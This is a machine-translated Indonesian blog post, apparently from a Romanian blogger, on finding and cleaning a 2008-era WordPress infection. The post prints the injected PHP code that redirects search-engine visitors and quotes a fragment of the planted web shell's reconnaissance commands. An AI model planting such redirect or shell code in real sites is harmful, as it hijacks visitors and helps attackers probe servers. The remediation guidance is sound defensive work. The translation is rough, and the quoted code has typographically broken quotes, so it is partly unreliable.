Dalam sebulan terakhir, kami telah menerima peringatan tentang virus di blog dari beberapa pengunjung. Awalnya saya mengabaikan peringatan itu, karena saya memiliki antivirus yang cukup bagus (Kaspersky tahun 2009) Dan meskipun saya berada di blog untuk waktu yang lama, saya tidak pernah menerima peringatan virus (.. Saya melihat sesuatu yang mencurigakan, yang pada penyegaran pertama menghilang. Akhirnya ...).
Perlahan, perlahan -lahan mulai muncul variasi besar Lalu Lintas Pengunjung, setelah itu akhir -akhir ini lalu lintas telah menurun terus -menerus dan semakin banyak mulai memberi tahu saya itu stealthsettings.com dia virus. Kemarin saya menerima dari seseorang yang dibuat tangkapan layar ketika antivirus diblokir a naskah dari silealthsettings.com:Trojan-clicker.html.iframe.gr. Dia cukup meyakinkan bagi saya untuk mencari saya di semua sumber. Gagasan pertama yang terlintas dalam pikiran adalah melakukannya meningkatkan di versi terakhir WordPress (2.5.1), tetapi tidak sebelum menghapus semua file dari skrip WordPress lama dan melakukan Cadangan di database. Prosedur ini tidak memberikan hasil apa pun dan mungkin akan membutuhkan waktu lama untuk memberi saya semak di mana bub Eugen Dalam diskusi kopi, yang dia temukan tautan Di Google dan akan lebih baik melihatnya.
Mydigitallife.info, telah menerbitkan sebuah artikel dengan judul: “WordPress Hack: Pulihkan dan perbaiki mesin google dan pencari atau tidak ada lalu lintas cookie yang dialihkan ke kebutuhan Anda.”, Apa akhir dari kawat yang saya butuhkan.
Ini tentang a mengeksploitasi oleh WordPress berdasarkan cookie, yang menurut saya sangat kompleks dan dibuat sebagai buku. Cukup pintar untuk membuat Injeksi SQL Di database blog, untuk membuat pengguna yang tidak terlihat untuk check -in rutin sederhana Dasbor->Pengguna, Untuk memeriksa direktur dan file server "writable" (yang memiliki chmod 777), untuk mencari dan untuk menjalankan file dengan hak istimewa grup atau bahkan root. Saya tidak tahu apa nama eksploitasi itu dan saya melihat bahwa ada beberapa artikel tertulis tentang hal itu, terlepas dari kenyataan bahwa ada banyak blog yang terinfeksi, termasuk dari Rumania. Oke ... Saya akan mencoba menjelaskan umum tentang virus ini.
Apa yang dilakukan virus itu?
Pertama -tama, ia memasukkan sumber -sumber halaman di blog, tautan yang tidak terlihat untuk pengunjung tetapi terlihat dan dapat diindeks untuk mesin pencari, terutama Google. Dengan cara ini Peringkat halaman transfer ke situs yang ditunjukkan oleh penyerang. Kedua, satu lagi dimasukkan Kode pengalihan Url, untuk pengunjung yang datang dari google, langsung, yahoo, ... atau dari pembaca RSS dan tidak memiliki situs di kue. Dan anti Virus mendeteksi pengalihan ini Trojan-clicker.html.
Gejala:
Penurunan besar -besaran dalam lalu lintas pengunjung, terutama di blog di mana sebagian besar pengunjung berasal dari Google.
Mengenali: (Dari sini masalahnya rumit bagi mereka yang tidak tahu berapa banyak phpMyadmin, php dan linux)
ITU. HATI-HATI!!! Pertama buat cadangan di database !!!
1. Periksa sumber file index.php, header.php, footer.php, dari tema blog dan lihat apakah ada kode yang menggunakan enkripsi base64 Atau apakah mengandung "if ($ ser ==" 1? && Siefof ($ _ cookie) == 0) "Forma:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>... atau yang serupa. Hapus kode ini!
Klik PE Imagine…
Di tangkapan layar di atas saya memilih dari kesalahan dan "<? php get_header (); ?>"Kode itu harus tetap ada.
2. Gunakan phpMyadmin dan buka database ke tabel WP_USERS, di mana Anda memeriksa apakah ada pengguna tanpa nama, dibuat pada tanggal 00: 00: 00 0000-00-00 (Dimungkinkan di lapangan user_login untuk menulis "WordPress". Perhatikan ID dari pengguna ini (bidang ID) dan kemudian bersihkan.
Klik PE Imagine…
*Yang ada di garis hijau, harus dihapus dan dipertahankan. Dalam kasusnya mengantuk, apakah id = 8 .
3. Pergi ke meja WP_USERMETA, di mana Anda harus melakukannya menemukan Anda MENGHAPUS garis yang terkait dengan ID (di mana di lapangan user_id nilai ID yang dihapus muncul).
4. Di meja WP_OPTION, masuk Active_plugins Dan Anda melihat plugin apa yang diaktifkan mencurigakan. Itu bisa menggunakan final seperti _old.igeff, _old.pnggg, _old.jpeg, _new.php.piff, dll. Kombinasi ekstensi gambar palsu dengan _old dan _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Bersihkan plugin ini, lalu buka blog -> Dasbor -> Plugin, tempat Anda menonaktifkan dan mengaktifkan plugin.
Klik pada gambar, lihat bagaimana file virus di Active_plugins muncul.
Ikuti jalur pada FTP atau SSH, ditunjukkan dalam assets_plugins dan hapus file di server.
5. Juga di phpMyadmin, di tabel WP_OPTION, temukan dan hapus baris yang berisi "RIS_F541B3ABD05E7962FCAB37737F40FAD8"Dan barisannya"internal_links_cache ”.
Di internal_links_cache, tautan spam yang muncul di blog dan satu ditempatkan Google Adsense, dari peretas.
6. Direkomendasikan untuk Ubah Kata Sandi logging di blog dan SA Menghilangkan semua pengguna yang mencurigakan. Tingkatkan ke versi terbaru WordPress dan atur blog untuk berhenti mendaftarkan pengguna baru. Tidak ada kerugian ... mereka bisa berkomentar dan tidak bersuara.
Saya mencoba di atas untuk menjelaskan berapa banyak, apa yang harus dilakukan dalam situasi seperti itu, untuk membersihkan blog virus ini. Masalahnya jauh lebih serius daripada yang terlihat dan tidak berarti terpecahkan, karena mereka digunakan Kerentanan keamanan dari Webserver hosting, di mana blognya.
Sebagai tindakan keamanan pertama yang memiliki akses ke Ssh, Untuk melakukan beberapa cek di server untuk melihat apakah ada lebih banyak file seperti * _old * dan * _new. * Dengan ujungnya.akan, .jpeg, .pngg, .jpgg. File -file ini harus dihapus. Jika kami mengganti nama file, mis. top_right_old.giff dalam top_right_old.php, kami melihat bahwa dalam file adalah kode server Exploit.
Beberapa indikasi yang berguna untuk memeriksa, membersihkan dan mengamankan server. (via SSH)
1. CD /TMP dan periksa apakah ada folder seperti tmpvflma atau kombinasi lain dari nama yang sama dan menghapusnya. Lihat di tangkapan layar di bawah ini, dua folder seperti itu untuk saya:
RM –RF numefolder
2. Periksa dan hilangkan (ubah CHMOD) sebanyak mungkin folder dengan atribut Chmod 777
Temukan semua file yang dapat ditulis di dir saat ini: menemukan . -type f -perm -2 -ls
Temukan semua direktori yang dapat ditulis di dir saat ini: menemukan . -type d -perm -2 -ls
Temukan semua direktori dan file yang dapat ditulis di dir saat ini: menemukan . -perm -2 –ls
3. Cari file yang mencurigakan di server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, HATI-HATI!!! ke file yang mengatur bit SELATAN Dan Skate. File -file ini dieksekusi dengan hak istimewa pengguna (grup) atau root, bukan dengan pengguna yang menjalankan file. File -file ini dapat menyebabkan kompromi root, jika ada masalah keamanan. Jika Anda tidak menggunakan file dengan bit Suid dan SGID, jalankan "chmod 0 " pada mereka atau uninstall paket yang berisi mereka.
Eksploitasi berisi suatu tempat di sumber ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... Pada dasarnya dengan cara ini dia menemukan ras dalam keamanan. Buka port, sutradara "Writeable" dan eksekusi file dengan hak grup / root.
Saya kembali dengan detail ...
Beberapa blog yang terinfeksi: www.blegoo.com, www.visurat.ro,
Fulgerica.com, Denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
EMI.BRAINIENT.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... dan daftarnya bisa berlanjut ... sangat banyak.
Anda dapat memeriksa apakah sebuah blog adalah virus, menggunakan mesin pencari Google. menyalin & Tempel:
Situs: www.blegoo.com Beli
Selamat malam dan meningkat ke pekerjaan itu;) Segera saya pikir Eugen akan datang, premiebible.imprevizible.com.
BRB :)
AT: Perhatian! Mengubah tema WordPress atau meningkatkan ke WordPress 2.5.1, bukan solusi untuk menyingkirkan virus ini.
